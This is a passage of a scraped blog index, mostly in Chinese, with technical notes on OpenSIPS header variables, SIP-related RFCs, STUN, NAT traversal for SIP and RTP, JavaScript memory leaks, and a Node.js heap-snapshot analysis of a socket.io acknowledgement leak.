faster.\n$(hdrcnt(name)) \u0026ndash; returns number of headers of type given by \u0026rsquo;name\u0026rsquo;. Uses same rules for specifying header names as $hdr(name) above. Many headers (e.g., Via, Path, Record-Route) may appear more than once in the message. This variable returns the number of headers of a given type.\nNote that some headers (e.g., Path) may be joined together with commas and appear as a single header line. This variable counts the number of header lines, not header values.\nFor message fragment below, $hdrcnt(Path) will have value 2 and $(hdr(Path)[0]) will have value \u0026lt;a.com\u0026gt;:\nPath: \u0026lt;a.com\u0026gt; Path: \u0026lt;b.com\u0026gt; For message fragment below, $hdrcnt(Path) will have value 1 and $(hdr(Path)[0]) will have value \u0026lt;a.com\u0026gt;,\u0026lt;b.com\u0026gt;:\nPath: \u0026lt;a.com\u0026gt;,\u0026lt;b.com\u0026gt; Note that both examples above are semantically equivalent but the variables take on different values.\n","permalink":"https://wdd.js.org/2.4.x-docs/core-vars/","summary":"脚本变量 avp 变量 伪变量 SIP 头, $(hrd(name)) $(hdr(name)[N]) - represents the body of the N-th header identified by \u0026rsquo;name\u0026rsquo;. If [N] is omitted then the body of the first header is printed. The first header is got when N=0, for the second N=1, a.s.o. To print the last header of that type, use -1, no other negative values are supported now. No white spaces are allowed inside the specifier (before }, before or after {, [, ] symbols).","title":"核心变量"},{"content":" RFC 名称 https://tools.ietf.org/html/rfc3261 SIP: Session Initiation Protocol https://tools.ietf.org/html/rfc3665 Session Initiation Protocol (SIP) Basic Call Flow Examples https://tools.ietf.org/html/rfc6141 Re-INVITE and Target-Refresh Request Handling in the Session Initiation Protocol (SIP) https://tools.ietf.org/html/rfc4566 SDP: Session Description Protocol https://tools.ietf.org/html/rfc4028 Session Timers in the Session Initiation Protocol (SIP) https://tools.ietf.org/html/rfc1889 RTP: A Transport Protocol for Real-Time Applications https://tools.ietf.org/html/rfc2326 Real Time Streaming Protocol (RTSP) https://tools.ietf.org/html/rfc2327 SDP: Session Description Protocol https://tools.ietf.org/html/rfc3015 Megaco Protocol Version 1.0 https://tools.ietf.org/html/rfc1918 Address Allocation for Private Internets https://tools.ietf.org/html/rfc2663 IP Network Address Translator (NAT) Terminology and Considerations https://tools.ietf.org/html/rfc3605 Real Time Control Protocol (RTCP) attribute in Session Description Protocol (SDP) https://tools.ietf.org/html/rfc3711 The Secure Real-time Transport Protocol (SRTP) https://tools.ietf.org/html/rfc4568 Session Description Protocol (SDP) Security Descriptions for Media Streams https://tools.ietf.org/html/rfc4585 Extended RTP Profile for Real-time Transport Control Protocol (RTCP)-Based Feedback (RTP/AVPF) https://tools.ietf.org/html/rfc5124 Extended Secure RTP Profile for Real-time Transport Control Protocol (RTCP)-Based Feedback (RTP/SAVPF) https://tools.ietf.org/html/rfc5245 Interactive Connectivity Establishment (ICE): A Protocol for Network Address Translator (NAT) Traversal for Offer/Answer Protocols https://tools.ietf.org/html/rfc5626 Managing Client-Initiated Connections in the Session Initiation Protocol (SIP) https://tools.ietf.org/html/rfc5761 Multiplexing RTP Data and Control Packets on a Single Port https://tools.ietf.org/html/rfc5764 Datagram Transport Layer Security (DTLS) Extension to Establish Keys for the Secure Real-time Transport Protocol (SRTP) ","permalink":"https://wdd.js.org/opensips/ch1/sip-rfcs/","summary":"RFC 名称 https://tools.ietf.org/html/rfc3261 SIP: Session Initiation Protocol https://tools.ietf.org/html/rfc3665 Session Initiation Protocol (SIP) Basic Call Flow Examples https://tools.ietf.org/html/rfc6141 Re-INVITE and Target-Refresh Request Handling in the Session Initiation Protocol (SIP) https://tools.ietf.org/html/rfc4566 SDP: Session Description Protocol https://tools.ietf.org/html/rfc4028 Session Timers in the Session Initiation Protocol (SIP) https://tools.ietf.org/html/rfc1889 RTP: A Transport Protocol for Real-Time Applications https://tools.ietf.org/html/rfc2326 Real Time Streaming Protocol (RTSP) https://tools.ietf.org/html/rfc2327 SDP: Session Description Protocol https://tools.ietf.org/html/rfc3015 Megaco Protocol Version 1.0 https://tools.ietf.org/html/rfc1918 Address Allocation for Private Internets https://tools.","title":"SIP相关RFC协议"},{"content":" title: \u0026ldquo;STUN协议笔记\u0026rdquo; date: \u0026ldquo;2022-01-06 17:54:10\u0026rdquo; draft: false STUN是Simple Traversal of User Datagram Protocol (UDP) through Network Address Translators (NAT’s)的缩写 传输层底层用的是UDP 主要用来NAT穿透 主要用来解决voip领域的单方向通话(one-way)的问题 目的是让NAT后面的设备能发现自己的公网IP以及NAT的类型 让外部设备能够找到合适的端口和内部设备通信 刷新NAT绑定,类似keep-alive机制。否则端口映射可能因为超时被释放 STUN是cs架构的协议 客户端端192.168.1.3,使用5060端口,发送stun请求到 64.25.58.65, 经过了192.168.1.1的网关之后 网关将源ip改为212.128.56.125, 端口改为15050 stun服务器将请求发送到 网关的外网端口15050,然后网关将请求转发给192.168.1.3:5060 stun message type which typically is one of the below: - 0x0001 : Binding Request - 0x0101 : Binding Response\n0x0111 : Binding Error Response 0x0002 : Shared Secret Request 0x0102 : Shared Secret Response 0x0112 : Shared Secret Error Response **0x0001: MAPPED-ADDRESS - **This attribute contains an IP address and port. It is always placed in the Binding Response, and it indicates the source IP address and port the server saw in the Binding Request sent from the client, i.e.; the STUN client’s public IP address and port where it can be reached from the internet.\n0x0002: RESPONSE-ADDRESS - This attribute contains an IP address and port and is an optional attribute, typically in the Binding Request (sent from the STUN client to the STUN server). It indicates where the Binding Response (sent from the STUN server to the STUN client) is to be sent. If this attribute is not present in the Binding Request, the Binding Response is sent to the source IP address and port of the Binding Request which is attribute 0x0001: MAPPED-ADDRESS.\n0x0003: CHANGE-REQUEST - This attribute, which is only allowed in the Binding Request and optional, contains two flags; to control the IP address and port used to send the response. These flags are called \u0026ldquo;change IP\u0026rdquo; and \u0026ldquo;change Port\u0026rdquo; flags. The \u0026ldquo;change IP\u0026rdquo; and \u0026ldquo;change Port\u0026rdquo; flags are useful for determining whether the client is behind a restricted cone NAT or restricted port cone NAT. They instruct the server to send the Binding Responses from a different source IP address and port.\n**0x0004: SOURCE-ADDRESS - **This attribute is usually present in Binding Responses; it indicates the source IP address and port where the response was sent from, i.e. the IP address of the machine the client is running on (typically an internal private IP address). It is very useful as from this attribute the STUN server can detect twice NAT configurations.\n**0x0005: CHANGED-ADDRESS - **This attribute is usually present in Binding Responses; it informs the client of the source IP address and port that would be used if the client requested the \u0026ldquo;change IP\u0026rdquo; and \u0026ldquo;change port\u0026rdquo; behaviour.\n0x0006: USERNAME - This attribute is optional and is present in a Shared Secret Response with the PASSWORD attribute. It serves as a means to identify the shared secret used in the message integrity check.\n0x0007: PASSWORD - This attribute is optional and only present in Shared Secret Response along with the USERNAME attribute. The value of the PASSWORD attribute is of variable length and used as a shared secret between the STUN server and the STUN client.\n0x0008: MESSAGE-INTEGRITY - This attribute must be the last attribute in a STUN message and can be present in both Binding Request and Binding Response. It contains HMAC-SHA1 of the STUN message.\n**0x0009: ERROR-CODE - **This attribute is present in the Binding Error Response and Shared Secret Error Response only. It indicates that an error has occurred and indicates also the type of error which has occurred. It contains a numerical value in the range of 100 to 699; which is the error code and also a textual reason phrase encoded in UTF-8 describing the error code, which is meant for the client.\n0x000a: UNKNOWN-ATTRIBUTES - This attribute is present in the Binding Error Response or Shared Secret Error response when the error code is 420; some attributes sent from the client in the Request are unknown and the server does not understand them.\n0x000b: REFLECTED-FROM - This attribute is present only in Binding Response and its use is to provide traceability so the STUN server cannot be used as part of a denial of service attack. It contains the IP address of the source from where the request came from, i.e. the IP address of the STUN client.\nCommon STUN Server error codes Like many other protocols, the STUN protocol has a list of error codes. STUN protocol error codes are similar to those of HTTP or SIP. Below is a list of most common error codes encountered when using the STUN protocol. For a complete list of STUN protocol error codes refer to the STUN RFC 3489.\nError Code 400 - Bad request; the request was malformed. Client must modify request and try sending it again. Error Code 420 - Unknown attribute; the server did not understand an attribute in the request. Error Code 430 - Stale credentials; the shared secret sent in the request is expired; the client should obtain a new shared secret. Error Code 432 - Missing username; the username attribute is not present in the request. Error Code 500 - Server error; temporary error and the client should try to send the request again. 下图是一个webrtc呼叫的抓包,可以看到,在呼叫建立前的阶段。服务端和客户端都相互发送了Binding Request和响应了Bind Response。\n并且在通话过程中,还会有持续的binding reqeust, 并且在某些时候,源端口可能会变。说明媒体发送的端口也已经发生了改变。\n如果binding request 请求没有响应,那么语音很可以也会断,从而导致了呼叫挂断。\n参考 https://www.3cx.com/blog/voip-howto/stun/ https://www.3cx.com/blog/voip-howto/stun-voip-1/ https://www.3cx.com/blog/voip-howto/stun-protocol/ https://www.3cx.com/blog/voip-howto/stun-details/ ","permalink":"https://wdd.js.org/opensips/ch1/stun-notes/","summary":"title: \u0026ldquo;STUN协议笔记\u0026rdquo; date: \u0026ldquo;2022-01-06 17:54:10\u0026rdquo; draft: false STUN是Simple Traversal of User Datagram Protocol (UDP) through Network Address Translators (NAT’s)的缩写 传输层底层用的是UDP 主要用来NAT穿透 主要用来解决voip领域的单方向通话(one-way)的问题 目的是让NAT后面的设备能发现自己的公网IP以及NAT的类型 让外部设备能够找到合适的端口和内部设备通信 刷新NAT绑定,类似keep-alive机制。否则端口映射可能因为超时被释放 STUN是cs架构的协议 客户端端192.168.1.3,使用5060端口,发送stun请求到 64.25.58.65, 经过了192.168.1.1的网关之后 网关将源ip改为212.128.56.125, 端口改为15050 stun服务器将请求发送到 网关的外网端口15050,然后网关将请求转发给192.168.1.3:5060 stun message type which typically is one of the below: - 0x0001 : Binding Request - 0x0101 : Binding Response\n0x0111 : Binding Error Response 0x0002 : Shared Secret Request 0x0102 : Shared Secret Response 0x0112 : Shared Secret Error Response **0x0001: MAPPED-ADDRESS - **This attribute contains an IP address and port.","title":"STUN协议笔记"},{"content":"什么是NAT? NAT(网络地址转换), 具体可以参考百科 https://baike.baidu.com/item/nat/320024。\nNAT是用来解决IPv4的地址不够的问题。\n例如上图,内网的主机,在访问外网时,源192.168的网址,会被改写成1.2.3.4。所以在server端看来,请求是从1.2.3.4发送过来的。\nNAT一般会改写请求的源IP包的源IP地址,也可能会改写tcp或者udp的源端口地址。\nNAT地址范围 互联网地址分配机构保留了三类网址只能由于私有地址,这些地址只能由于NAT内部,不能用于公网。\n如果在sip消息中,Contact头中的地址是192.168开头,聪明的服务器应该知道,这个请求来自NAT内部。\n10.0.0.0 - 10.255.255.255 (10/8 prefix) 172.16.0.0 - 172.31.255.255 (172.16/12 prefix) 192.168.0.0 - 192.168.255.255 (192.168/16 prefix) NAT 工作原理 NAT内部流量流出时,源IP和源端口都被改写,目标地址和端口不会改写。源ip和端口与被改写后的ip和端口存在一段时间的映射关系,当响应回来时,根据这个映射关系,NAT设备知道这个包应该发给内网的哪个设备。\nNAT分类 静态NAT: 每个内部主机都永久映射一个外部公网IP 动态NAT: 每个内部主机都动态映射一个外部公网IP 网络地址端口转换: 内部主机映射到外部不同端口上 由于静态NAT和动态NAT并不能节省公网IP, 常用的都是网络地址端口转换,即NAPT。\nNAPT 网络地址端口转换分类 全锥型NAT 限制锥型NAT: 限制主机 端口限制NAT:限制主机和端口 Full Cone NAT 全锥型NAT 打洞过程\n来自nat内部ip1:port1地址在经过路由器时,路由器会打洞ip1\u0026rsquo;:port1' 任何服务器只要把包发到ip1\u0026rsquo;:port1\u0026rsquo;,路由器都会把这个包发到ip1:port1。也就是说,即使刚开始打洞的包是发给server1的,如果server2知道这个洞的信息,那么server2也可以通过这洞,将消息发给ip1:port1 Restricted Cone NAT 限制锥型NAT 限制锥型打洞过程和全锥型差不多,只不过增加了限制。\n如果内部主机是把包发到server1的,即使server2知道打洞的信息,它发的包也不会被转给内部主机。 Port Restricted Cone NAT 端口限制NAT 端口限制NAT要比上述两种NAT的限制更为严格\n内部主机如果将消息发到server1的5080端口,那么这个端口只允许server1的5080端口发消息回来 server1的其他端口发消息到这个洞都会被拒绝 SIP信令NAT穿越 NAT内部消息发到fs时,会携带如下信息。假如fs对NAT一无所知,如果后续有呼叫,fs是无法将消息发到192.168.0.102的,因为192.168.0.102是内网地址。\n但是fs足够聪明,它会从分析包的源ip和源端口,从而正确的将sip消息送到NAT设备上。\nVia: SIP/2.0/UDP 192.168.1.160:11266;branch=z9hG4bK-d8754z-1f2cd509;rport Contact: \u0026lt;sip:flavio@192.168.1.160:11266\u0026gt; c=IN IP4 192.168.1.160 m=audio 8616 RTP/AVP 0 8 3 101 sip消息头Via, Contact以及sdp中的c=和m=, 可能会带有内网的ip和端口,如果不加以翻译处理,sip服务器是无法将消息发到这些内网地址上的。\nfs会将原始Contact头增加一些信息\nContact 1001@192.168.0.102:5060;fs_nat=yes;fs_path:sip:1001@1.2.3.4:23424 RTP流NAT穿越 c=IN IP4 192.168.40.79 m=audio 31114 RTP/AVP 0 8 9 101 一般invite消息或者200ok的sdp下都会携带连接信息, c=, 但是这个连接信息因为是内网地址,所以fs并不会使用这个作为rtp的对端地址。\nfs会等待NAT内部设备发来的第一个RTP包,fs会分析RTP包,提取出NAT设备上的RTP洞的信息,然后将另一方的语音流送到NAT设备上的洞里。\n再由NAT设备将RTP流送到对应的内部主机。\nNAT与SIP的问题 NAT设备,例如路由器,一般工作在网络层和传输层。NAT会修改网络层的IP地址和传输层的端口,但是NAT不会修改包的内容。sip消息都是封装到包内容中的。\n看一个INVITE消息,出现的内容都是内网中的,当sip服务器收到这个消息,那么它是无法向内网发送响应体的。\nVia 头中的10.1.1.221:5060 c=IN IP4 10.1.1.221 m=audio 49170 RTP/AVP 0 当然,有问题就有解决方案\nreceived 标记来源ip rport 标记来源端口 使用这两个字段,就可以将数据正确的发送到NAT设备上\nINVITE sip:UserB@there.com SIP/2.0 Via: SIP/2.0/UDP 10.1.1.221:5060;branch=z9hG4bKhjh From: TheBigGuy \u0026lt;sip:UserA@customer.com\u0026gt;;tag=343kdw2 To: TheLittleGuy \u0026lt;sip:UserB@there.com\u0026gt; Max-Forwards: 70 Call-ID: 123456349fijoewr CSeq: 1 INVITE Subject: Wow! It Works... Contact: \u0026lt;sip:UserA@10.1.1.221\u0026gt; Content-Type: application/sdp Content-Length: ... v=0 o=UserA 2890844526 2890844526 IN IP4 UserA.customer.coms=- t=0 0 c=IN IP4 10.1.1.221 m=audio 49170 RTP/AVP 0 a=rtpmap:0 PCMU/8000 参考 https://tools.ietf.org/html/rfc1918 ","permalink":"https://wdd.js.org/opensips/ch1/nat-sip-rtp/","summary":"什么是NAT? NAT(网络地址转换), 具体可以参考百科 https://baike.baidu.com/item/nat/320024。\nNAT是用来解决IPv4的地址不够的问题。\n例如上图,内网的主机,在访问外网时,源192.168的网址,会被改写成1.2.3.4。所以在server端看来,请求是从1.2.3.4发送过来的。\nNAT一般会改写请求的源IP包的源IP地址,也可能会改写tcp或者udp的源端口地址。\nNAT地址范围 互联网地址分配机构保留了三类网址只能由于私有地址,这些地址只能由于NAT内部,不能用于公网。\n如果在sip消息中,Contact头中的地址是192.168开头,聪明的服务器应该知道,这个请求来自NAT内部。\n10.0.0.0 - 10.255.255.255 (10/8 prefix) 172.16.0.0 - 172.31.255.255 (172.16/12 prefix) 192.168.0.0 - 192.168.255.255 (192.168/16 prefix) NAT 工作原理 NAT内部流量流出时,源IP和源端口都被改写,目标地址和端口不会改写。源ip和端口与被改写后的ip和端口存在一段时间的映射关系,当响应回来时,根据这个映射关系,NAT设备知道这个包应该发给内网的哪个设备。\nNAT分类 静态NAT: 每个内部主机都永久映射一个外部公网IP 动态NAT: 每个内部主机都动态映射一个外部公网IP 网络地址端口转换: 内部主机映射到外部不同端口上 由于静态NAT和动态NAT并不能节省公网IP, 常用的都是网络地址端口转换,即NAPT。\nNAPT 网络地址端口转换分类 全锥型NAT 限制锥型NAT: 限制主机 端口限制NAT:限制主机和端口 Full Cone NAT 全锥型NAT 打洞过程\n来自nat内部ip1:port1地址在经过路由器时,路由器会打洞ip1\u0026rsquo;:port1' 任何服务器只要把包发到ip1\u0026rsquo;:port1\u0026rsquo;,路由器都会把这个包发到ip1:port1。也就是说,即使刚开始打洞的包是发给server1的,如果server2知道这个洞的信息,那么server2也可以通过这洞,将消息发给ip1:port1 Restricted Cone NAT 限制锥型NAT 限制锥型打洞过程和全锥型差不多,只不过增加了限制。\n如果内部主机是把包发到server1的,即使server2知道打洞的信息,它发的包也不会被转给内部主机。 Port Restricted Cone NAT 端口限制NAT 端口限制NAT要比上述两种NAT的限制更为严格\n内部主机如果将消息发到server1的5080端口,那么这个端口只允许server1的5080端口发消息回来 server1的其他端口发消息到这个洞都会被拒绝 SIP信令NAT穿越 NAT内部消息发到fs时,会携带如下信息。假如fs对NAT一无所知,如果后续有呼叫,fs是无法将消息发到192.168.0.102的,因为192.168.0.102是内网地址。\n但是fs足够聪明,它会从分析包的源ip和源端口,从而正确的将sip消息送到NAT设备上。\nVia: SIP/2.0/UDP 192.168.1.160:11266;branch=z9hG4bK-d8754z-1f2cd509;rport Contact: \u0026lt;sip:flavio@192.","title":"SIP信令和媒体都绕不开的NAT问题"},{"content":"参考: http://slides.com/gruizdevilla/memory\n内存是一张图 原始类型,只能作为叶子。原始类型不能引用其他类型 数字 字符串 布尔值 除了原始类型之外,其他类型都是对象,其实就是键值对 数组是一种特殊对象,它的键是连续的数字 内存从根开始 在浏览器中,根对象是window 在nodejs中,根对象是global 任何从根无法到达的对象,都会被GC回收,例如下图的节点9和10 根节点的GC是无法控制的 路径 从根节点开始到特定对象的路径,如下图的1-2-4-6-8 支配项 每个对象有且仅有一个支配项,支配项对对象可能不是直接引用 举例子 节点1支配节点2 节点2支持节点3、4、6 节点3支配节点5 节点6支配节点7 节点5支配节点8 上面的例子有个不好理解的是节点2为什么支配了节点6?如果节点A存在于从根节点到节点B的每一个路径中,那么A就是B的支配项。2存在于1-2-4-6,也存在于1-2-3-6,所以节点2支配节点6 V8 新生代与老生代 v8内存分为新生代和老生代内存,两块内存使用不同的内存GC策略 相比而言,新生代GC很快,老生代则较慢 新生代的内存在某些条件下会被转到老生代内存区 GC发生时,用可能应用会暂停 解除引用的一些错误 var a = {name: \u0026#39;wdd\u0026#39;} delete a.name // 这回让对象a变成慢对象 var a = {name: \u0026#39;wdd\u0026#39;} a.name = null // 这个则更好 关于slow Object V8 optimizing compiler makes assumptions on your code to make optimizations. It transparently creates hidden classes that represent your objects. Using this hidden classes, V8 works much faster. If you \u0026ldquo;delete\u0026rdquo; properties, these assumptions are no longer valid, and the code is de-optimized, slowing your code. // Fast Object function FastPurchase(units, price) { this.units = units; this.price = price; this.total = 0; this.x = 1; } var fast = new FastPurchase(3, 25); // Slow Object function SlowPurchase(units, price) { this.units = units; this.price = price; this.total = 0; this.x = 1; } var slow = new SlowPurchase(3, 25); //x property is useless //so I delete it delete slow.x; Timers内存泄露 // var buggyObject = { callAgain: function () { var ref = this; var val = setTimeout(function () { console.log(\u0026#39;Called again: \u0026#39; + new Date().toTimeString()); ref.callAgain(); }, 1000); } }; buggyObject.callAgain(); buggyObject = null; 闭包内存泄露 var a = function () { var largeStr = new Array(1000000).join(\u0026#39;x\u0026#39;); return function () { return largeStr; }; }(); var a = function () { var smallStr = \u0026#39;x\u0026#39;, largeStr = new Array(1000000).join(\u0026#39;x\u0026#39;); return function (n) { return smallStr; }; }(); var a = function () { var smallStr = \u0026#39;x\u0026#39;, largeStr = new Array(1000000).join(\u0026#39;x\u0026#39;); return function (n) { eval(\u0026#39;\u0026#39;); //maintains reference to largeStr return smallStr; }; }(); DOM 内存泄露 #leaf maintains a reference to it\u0026rsquo;s parent (parentNode), and recursively up to #tree, so only when leafRef is nullified is the WHOLE tree under #tree candidate to be GC\nvar select = document.querySelector; var treeRef = select(\u0026#34;#tree\u0026#34;); var leafRef = select(\u0026#34;#leaf\u0026#34;); var body = select(\u0026#34;body\u0026#34;); body.removeChild(treeRef); //#tree can\u0026#39;t be GC yet due to treeRef treeRef = null; //#tree can\u0026#39;t be GC yet, due to //indirect reference from leafRef leafRef = null; //NOW can be #tree GC 守则 Use appropiate scope Better than de-referencing, use local scopes. Unbind event listeners Unbind events that are no longer needed, specially if the related DOM objects are going to be removed. Manage local cache Be careful with storing large chunks of data that you are not going to use. 分析内存泄漏的工具 浏览器: performance.memory devtool memory profile 关于闭包的提示 给闭包命名,这样在内存分析时,就可以按照函数名找到对应的函数 ","permalink":"https://wdd.js.org/fe/memory-leak-ppt/","summary":"参考: http://slides.com/gruizdevilla/memory\n内存是一张图 原始类型,只能作为叶子。原始类型不能引用其他类型 数字 字符串 布尔值 除了原始类型之外,其他类型都是对象,其实就是键值对 数组是一种特殊对象,它的键是连续的数字 内存从根开始 在浏览器中,根对象是window 在nodejs中,根对象是global 任何从根无法到达的对象,都会被GC回收,例如下图的节点9和10 根节点的GC是无法控制的 路径 从根节点开始到特定对象的路径,如下图的1-2-4-6-8 支配项 每个对象有且仅有一个支配项,支配项对对象可能不是直接引用 举例子 节点1支配节点2 节点2支持节点3、4、6 节点3支配节点5 节点6支配节点7 节点5支配节点8 上面的例子有个不好理解的是节点2为什么支配了节点6?如果节点A存在于从根节点到节点B的每一个路径中,那么A就是B的支配项。2存在于1-2-4-6,也存在于1-2-3-6,所以节点2支配节点6 V8 新生代与老生代 v8内存分为新生代和老生代内存,两块内存使用不同的内存GC策略 相比而言,新生代GC很快,老生代则较慢 新生代的内存在某些条件下会被转到老生代内存区 GC发生时,用可能应用会暂停 解除引用的一些错误 var a = {name: \u0026#39;wdd\u0026#39;} delete a.name // 这回让对象a变成慢对象 var a = {name: \u0026#39;wdd\u0026#39;} a.name = null // 这个则更好 关于slow Object V8 optimizing compiler makes assumptions on your code to make optimizations. It transparently creates hidden classes that represent your objects.","title":"JavaScript内存泄露分析"},{"content":"什么是内存泄漏? 单位时间内的内存变化量可能有三个值\n正数:内存可能存在泄漏。生产环境,如果服务在启动后,该值一直是正值,从未出现负值或者趋近于0的值,那么极大的可能是存在内存泄漏的。 趋近于0的值: 内存稳定维持 负数:内存在释放 实际上,在观察内存变化量时,需要有两个前提条件\n一定的负载压力:因为在开发或者功能测试环境,很少的用户,服务的压力很小,是很难观测到内存泄漏问题的。所以务必在一定的负载压力下观测。 至少要观测一天:内存上涨并不一定意味着存在内存泄漏问题。在一个工作日中,某些时间点,是用户使用的高峰期,服务的负载很高,自然内存使用会增长。关键在于在高峰期过后的低谷期时,内存是否回下降到正常值。如果内存在低谷期时依然维持着高峰期时的内存使用,那么非常大可能是存在内存泄漏了。 下图是两个服务的。从第一天的0点开始观测服务的内存,一直到第二天的12点。正常的服务会随着负载的压力增加或者减少内存使用。而存在内存泄漏的服务,内存一直在上升,并且负载压力越大,上升的越快。\n有没有可能避免内存泄漏? 除非你不写代码,否者你是无法避免内存泄漏的问题的。\n第一,即使你是非常精通某个语言,也是有很多关于如何避免内存泄漏的经验。但是你的代码里仍然可能会包含其他库或者其他同事写的代码,那些代码里是无法保证是否存在内存泄漏问题的。 第二,内存泄漏的代码有时候非常难以察觉。例如console.log打印的太快,占用太多的buffer。网络流量激增,占用太多的Recv_Q,node无法及时处理。写文件太慢,没有处理“后压”相关的逻辑等等。\n为什么要关注内存泄漏? 为什么要关注内存泄漏?我们客户的服务器可是有500G内存的\n你可能有个很豪的金主。但是你不要忘记一个故事。\n传说国际象棋是由一位印度数学家发明的。国王十分感谢这位数学家,于是就请他自己说出想要得到什么奖赏。这位数学家想了一分钟后就提出请求——把1粒米放在棋盘的第1格里,2粒米放在第2格,4粒米放在第3格,8粒米放在第4格,依次类推,每个方格中的米粒数量都是之前方格中的米粒数量的2倍。\n国王欣然应允,诧异于数学家竟然只想要这么一点的赏赐——但随后却大吃了一惊。当他开始叫人把米放在棋盘上时,最初几个方格中的米粒少得像几乎不存在一样。但是,往第16个方格上放米粒时,就需要拿出1公斤的大米。而到了第20格时,他的那些仆人则需要推来满满一手推车的米。国王根本无法提供足够的大米放在棋盘上的第64格上去。因为此时,棋盘上米粒的数量会达到惊人的18 446 744 073 709 551 615粒。如果我们在伦敦市中心再现这一游戏,那么第64格中的米堆将延伸至M25环城公路,其高度将超过所有建筑的高度。事实上,这一堆米粒比过去1000年来全球大米的生产总量还要多得多。\n对于内存泄漏来说,可能500G都是不够用的。\n实际上操作系统对进程使用内存资源是有限制的,我们关注内存泄漏,实际上是关注内存泄漏会引起的最终问题:out of memory。如果进程使用的资源数引起了操作系统的注意,很可能进程被操作系统杀死。\n然后你的客户可能正在使用你的服务完成一个重要的事情,接着你们的客户投诉热线回被打爆,然后是你的老板,你的领导找你谈话~~~\n基本类型 vs 引用类型 基本类型:undefined, null, boolean, number, string。基本类型是按值访问 引用类型的值实际上是指向内存中的对象 上面的说法来自《JavaScript高级程序设计》。但是对于基本类型字符串的定义,实际上我是有些不认同的。有些人也认为字符串不属于基本类型。\n就是关于字符串,我曾思考过,在JavaScript里,字符串的最大长度是多少,字符串最多能装下多少个字符?\n我个人认为,一个变量有固定的大小的内存占用,才是基本类型。例如数字,null, 布尔值,这些值很容易能理解他们会占用固定的内存大小。但是字符串就不一样了。字符串的长度是不固定,在不同的浏览器中,有些字符串最大可能占用256M的内存,甚至更多。\n可以参考这个问题:https://stackoverflow.com/questions/34957890/javascript-string-size-limit-256-mb-for-me-is-it-the-same-for-all-browsers\n内存是一张图 1代表根节点,在NodeJS里是global对象,在浏览器中是window对象 2-6代表对象 7-8代表原始类型。分别有三种,字符串,数字,布尔值 9-10代表从根节点无法到达的对象 注意,作为原始类型的值,在内存图中只能是叶子节点。 ** 从跟节点R0无法到达的节点9,10,将会在GC时被清除。\n保留路径的含义是从跟对象到某一节点的最短路径。例如1-\u0026gt;2-\u0026gt;4-\u0026gt;6。\n对象保留树 节点: 构造函数的名称 边缘:对象的key 距离: 节点到跟节点的最短距离 支配项(Dominators) 每个对象有且仅有一个支配项 如果B存在从根节点到A节点之间的所有路径中,那么B是A的支配项,即B支配A。 下图中\n1支配2 2支配3,4,6 (想想2为什么没有支配5?) 3支配5 6支配7 5支配8 理解支配项的意义在于理解如何将资源释放。如下图所示,如果目标是释放节点6的占用资源,仅仅释放节点3或者节点4是没有用的,必需释放其支配项节点2,才能将节点6释放。 对象大小 对象自身占用大小:shadow size 通过保持对其他对象的引用隐式占用,这种方式可以阻止这些对象被垃圾回收器(简称 GC)自动处置 对象的大小的单位是字节 分析工具 heapsnapshot import {writeHeapSnapshot} from \u0026#39;v8\u0026#39; router.get(\u0026#39;/heapdump\u0026#39;, function (req: express.Request, res: express. Response, next: express.NextFunction) { logger.debug(\u0026#39;help_heapdump::\u0026#39;, req.ip, req.hostname) if (req.hostname !== \u0026#39;localhost\u0026#39;) { logger.error(\u0026#39;error:report_bad_host:\u0026#39;, req.hostname) return res.status(401).end() } res.status(200).end() let fileName = writeHeapSnapshot(\u0026#39;node.heapsnapshot\u0026#39;) logger.info(\u0026#39;help_heapdumap_file::\u0026#39;, fileName) }) 通过将v8 writeHeapSnapshot放到express的路由中,我们可以简单通过curl的方式产生snapshot文件。需要注意的是,writeHeapSnapshot可能需要一段时间来产生snapshot文件。在生产环境要注意,需要注意产生该函数的调用频率。\n拿到snapshot文件后,下一步是使用chrome dev-tools去打开这个文件。\n在chrome的inspect页面:chrome://inspect/#devices\n点击Open dedicated DevTools for Node。可以打开一个单独的页面dev-tools页面。当然你也可以任意一个页面打开devTools.\n点击load, 选择snapshot文件,就可以加载了。 真实的内存泄漏实战分析: socket.io内存泄漏 我写过一个使用socket.io来完成实时消息推送的服务,在做压力测试的时候,两个实例,模拟2000个客户端WebSocket连接,然后以每秒1000个速度发送消息,在持续压测15个小时之后,Node.js的内存从50M上涨到1.5G。所以,这其中必然产生了内存泄漏。\n在array这一列,可以看出它占用的Shallow Size和Retained Size占用的内存都是超过90%的。 我们展开array这一列,可以发现有很多的distance是15的对象。然后我们展开其中一个对象后。\n可以发现从距离是14到1之间的保留路径。\n展开一个对象之后,发现有很多ackClient,这个ackClient实际上对应了代码里我写的一个函数,用来确认消息是否被客户端收到的。这个确认机制是socket.io提供的。\n当我确认内存泄漏是socket.io的确认机制的问题后,我就将确认的函数从代码中移除,改为消息不确认。在一段时间的压测过后,服务的内存趋于稳定,看来问题已经定位了。\nsocket.io内存泄漏的原因 在阅读了socket.io的源码之后,可以看到每个Socket对象都有一个acks对象用来表示确认。\nfunction Socket(nsp, client, query){ this.nsp = nsp; this.server = nsp.server; this.adapter = this.nsp.adapter; this.id = nsp.name !== \u0026#39;/\u0026#39; ? nsp.name + \u0026#39;#\u0026#39; + client.id : client.id; this.client = client; this.conn = client.conn; this.rooms = {}; this.acks = {}; this.connected = true; this.disconnected = false; this.handshake = this.buildHandshake(query); this.fns = []; this.flags = {}; this._rooms = []; } 在调用socket.emit()方法时,socket.io会将消息的id附着在acks对象上,可以想象,随着消息发送的量增大,这个acks的属性将会越来越多。\nif (typeof args[args.length - 1] === \u0026#39;function\u0026#39;) { if (this._rooms.length || this.flags.broadcast) { throw new Error(\u0026#39;Callbacks are not supported when broadcasting\u0026#39;); } debug(\u0026#39;emitting packet with ack id %d\u0026#39;, this.nsp.ids); this.acks[this.nsp.ids] = args.pop(); packet.id = this.nsp.ids++; } 当收到ack之后,acks上对应的包的属性才会被删掉。\nSocket.prototype.onack = function(packet){ var ack = this.acks[packet.id]; if (\u0026#39;function\u0026#39; == typeof ack) { debug(\u0026#39;calling ack %s with %j\u0026#39;, packet.id, packet.data); ack.apply(this, packet.data); delete this.acks[packet.id]; } else { debug(\u0026#39;bad ack %s\u0026#39;, packet.id); } }; 如果客户端不对消息进行ack确认,那么服务端就会积累非常多的待确认的消息,最终导致内存泄漏。\n虽然这个问题的最终原因是客户端没有及时确认,但是查看一下socket.io的项目,发现已经有将近500个issue没有解决。我觉得有时间的话,我会用原生的websocket替换掉socket.io。不然这个socket.io很可能回成为项目的一个瓶颈点。\n参考资料 http://slides.com/gruizdevilla/memory http://bmeck.github.io/snapshot-utils/doc/manual/terms.html 